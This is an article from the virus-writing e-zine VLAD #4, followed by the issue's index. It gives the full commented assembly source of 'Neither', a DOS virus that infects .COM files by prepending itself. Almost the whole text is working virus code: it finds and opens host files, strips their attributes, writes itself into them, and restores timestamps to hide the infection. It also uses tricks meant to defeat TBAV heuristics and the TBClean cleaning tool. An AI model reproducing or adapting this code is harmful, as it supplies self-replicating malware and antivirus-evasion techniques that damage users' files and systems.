Virus Labs & Distribution
VLAD #4 - Neither


; [neither here, nor there]
; an app-pre-pender.
;
; by Metabolis/VLAD
; thanks to Antigen for helping with bugs/optimizations
;
; "there was a time when there was nothing at all
;  nothing at all, just a distant hum
;  there was a being and he lived on his own
;  he had no one to talk to, and nothing to do
;
;  he drew up the plans
;  learnt to work with his hands
;  a million years passed by
;  and his work was done
;
;  and his words were these
;
;  hope you find it in everything
;  everything that you seek
;  hope you find it in everything
;  everything that you seek
;  hope you find it, hope you find it
;  hope you find it new"
;
;  "hide and seek" - Howard Jones (bite me TU!)
;
; This virus will not spread at all, due to the fact that it's
; direct action and has no real spreading methods such as path/
; traversal dir infection.  The reason I wrote this was just to
; see if I could get the app/pre part of it working, and of course
; to get some code in the magazine which people who're the same
; level as me can understand ;)  I guess you could call it a
; laboratory specimen heh.
;
; 593 bytes when it infects
;
; features
; - findfirst/findnext (woop!)
; - relocated DTA (in a rather lame way hehe)
; - killed tbav flags E,B and C (still scans as F)
;   it would be too much hassle to remove F, so stuff it ;)
; - checks if the infectee is the right size
; - won't infect command.com
; - won't infect com files which are really EXEs
; - checks for previous infection
; - restores original date, time and attributes
; - since my virus prepends, tbclean shits itself
;   and truncates the file you want to clean ;)

        org     100h                            ; it's a com file ;)

start:
        call    $+3                             ; ok, here we get the
next:   int     3h                              ; (kills TBAV heuristic)
        pop     bp                              ; delta offset of the
        sub     bp,offset next                  ; virus and plug it in bp
        jmp     set_dta

mask    db      '*.c?m',00h                     ; filemask for findfirst/fn
infsize dw      back-middle                     ; infectee's filesize

set_dta:

        mov     ah,1ah                          ; set the dta to a little
        mov     dx,0fae0h                       ; before the end of 64k
        int     21h                             ; (enough room for buffer
                                                ; and the tempdta)
find_first:

        lea     dx,[bp+offset mask]
        mov     ah,4eh                          ; find first file
        mov     cx,7                            ; with any attributes
        int     21h
        jc      goto_restore                    ; error?  no .com files
        jmp     open_file                       ; we got one, let's check it

find_next:

        call    close_file                      ; make sure file is closed

        mov     ah,4fh                          ; find next file
        int     21h
        jnc     open_file                       ; if no errors, open file

goto_restore:

        jmp     restore                         ; error, run original prog

calculate_dx:

        lea     dx,[bp+offset middle]           ; get offset middle
        add     dx,word ptr [bp+infsize]        ; the size of infected file
        add     dx,end-back                     ; add second half
        ret

close_file:

        mov     ah,3eh                          ; close file
        int     21h
        ret

open_file:

        cmp     word ptr [0fae0h+1eh],'OC'      ; don't infect command.com
        je      find_next

        cmp     word ptr [0fae0h+1ah],1000      ; bah only infect files
        jbe     find_next                       ; above 1000 bytes

        cmp     word ptr [0fae0h+1ah],0fae0h    ; infect those which leave
        jae     find_next                       ; enough space for buffer

        mov     dx,0fae0h+1eh                   ; get filename to infect
        mov     ax,4301h                        ; put normal attributes
        mov     cx,20h                          ; on the file..
        int     21h

        mov     ax,3D02h                        ; open file for read/write
        int     21h                             ; (filename still in dx)
        jc      find_next                       ; error ? find another file
        
        xchg    bx,ax                           ; put file handle in BX

        mov     cx,middle-start                 ; read front half to file
        mov     ah,03fh                         ; first we must
        call    calculate_dx
        int     21h                             ; this is to point to the
        push    dx                              ; buffer to read bytes to

        mov     si,dx
        mov     cx,word ptr si                  ; check if it's an EXE
        add     cl,ch                           ; file we're about to
        cmp     cl,167                          ; infect!
        je      find_next
                                                ; check if the file has
        mov     ax,word ptr si                  ; already been infected
        cmp     ax,000e8h                       ; so we're...
        je      find_next                       ; looking for e800
        mov     cx,word ptr [0fae0h+1ah]
        mov     word ptr [bp+infsize],cx        ; write new infectee filesize

        mov     ax,4200h                        ; lseek to begin of file
        cwd                                     ; (xor dx,dx)
        xor     cx,cx
        int     21h

        mov     cx,middle-start                 ; write the first half
        mov     ah,40h                          ; of the virus to the start
        lea     dx,[bp+offset start]            ; of the file
        int     21h

        mov     ax,4202h                        ; get to the end
        cwd                                     ; of the file (xor dx,dx)
        xor     cx,cx
        int     21h

        pop     dx                              ; write the
        mov     cx,middle-start                 ; original top bytes
        mov     ah,40h                          ; we will replace them later
        int     21h

        mov     cx,end-back                     ; write second half of
        sub     dx,cx                           ; the virus to the end
        mov     si,dx                           ; of the file
        mov     ah,40h
        int     21h

        push    dx

        xor     cx,cx
        mov     cl,byte ptr [0fae0h+15h]        ; get old attr from DTA
        mov     dx,0fae0h+1eh                   ; position of filename in DTA
        mov     ax,4301h                        ; set attr to original
        int     21h
        mov     cx,0fae0h+16                    ; date and
        mov     dx,es                           ; time
        mov     ax,5701h                        ; set file date/time
        int     21h

        pop     dx
    
        jmp     after_restore
                                                ; to the most beautiful
sop     db      "I love you P, always will "    ; girl in the world,
                                                ; if only things were
restore:                                        ; different :(

        call    calculate_dx                    ; this gives dx the address
        sub     dx,end-back                     ; of the com's original
                                                ; bytes which were at 100h
after_restore:

        call    close_file

        jmp     dx                              ; jump to the second half
                                                ; of our code.
middle:

        db      (middle-start) dup (?)          ; just some dummy shit
        int     20h                             ; so it will quit after
        db      (middle-start)-2 dup (?)        ; executing the first gen.

back:

; The virus isn't actually split in *half* technically, the only
; code which is appended to the file is that which runs the original
; infected program.  If I put anything else down the end here it
; would've been hell to calculate all the offsets .. so this'll do me ;)

        mov     cx,middle-start                 ; we want to write the bytes
        mov     si,dx                           ; we wrote over at the start
        sub     si,cx                           ; of the file to 100h so
        mov     di,100h                         ; we can run it as usual
        rep     movsb                           ; (funnily enough, that's
        mov     ax,100h-1                       ; what this part does!)
        inc     ax                              ; this will nuke a tbav
        jmp     ax                              ; heuristic.. cool huh

        db      " [neither here, nor there]"    ; virus name!
        db      " Metabolis/VLAD"               ; author! (duh)

end:

fbuffer db      middle-start dup (?)            ; place to store the first
                                                ; bit of the infectee when
                                                ; overwriting it.

; this virus was brought to you by the TBAV flags, C,B,E and F

- VLAD #4 INDEX -
ARTICLE.0_0       Hidden Area Story By QuantumG

ARTICLE.1_1      

Introduction
ARTICLE.1_2       Aims and Policies
ARTICLE.1_3       Greets
ARTICLE.1_4       Members/Joining
ARTICLE.1_5       Dist/Contact Info
ARTICLE.1_6       Hidden Area Info
ARTICLE.1_7       Coding the Mag

ARTICLE.2_1      

Tax Office
ARTICLE.2_2       Fight Back!
ARTICLE.2_3       Interviews
ARTICLE.2_4       Cryptanalysis
ARTICLE.2_5       Slovakia
ARTICLE.2_6       TBMem Flaws
ARTICLE.2_7       F-Prot Troubles

ARTICLE.3_1      

Win Infection
ARTICLE.3_2       WinVir14 Disasm
ARTICLE.3_3       Andropinis
ARTICLE.3_4       Super Virus-2
ARTICLE.3_5       VTBoot
ARTICLE.3_6       Ebbelwoi VQ7
ARTICLE.3_7       Unix Viruses

ARTICLE.4_1      

Virus Descriptions
ARTICLE.4_2       Ender Wiggin
ARTICLE.4_3       WinSurfer
ARTICLE.4_4       Antipode 2.0
ARTICLE.4_5       Bane
ARTICLE.4_6       RHINCE
ARTICLE.4_7       Tasha Yar

ARTICLE.5_1      

Replicator
ARTICLE.5_2       ART v2.2
ARTICLE.5_3       Good Times!
ARTICLE.5_4       DOS Idle
ARTICLE.5_5       Neither
ARTICLE.5_6       Virus Scripts
ARTICLE.5_7       What's Next ?

About VLAD - Links - Contact Us - Main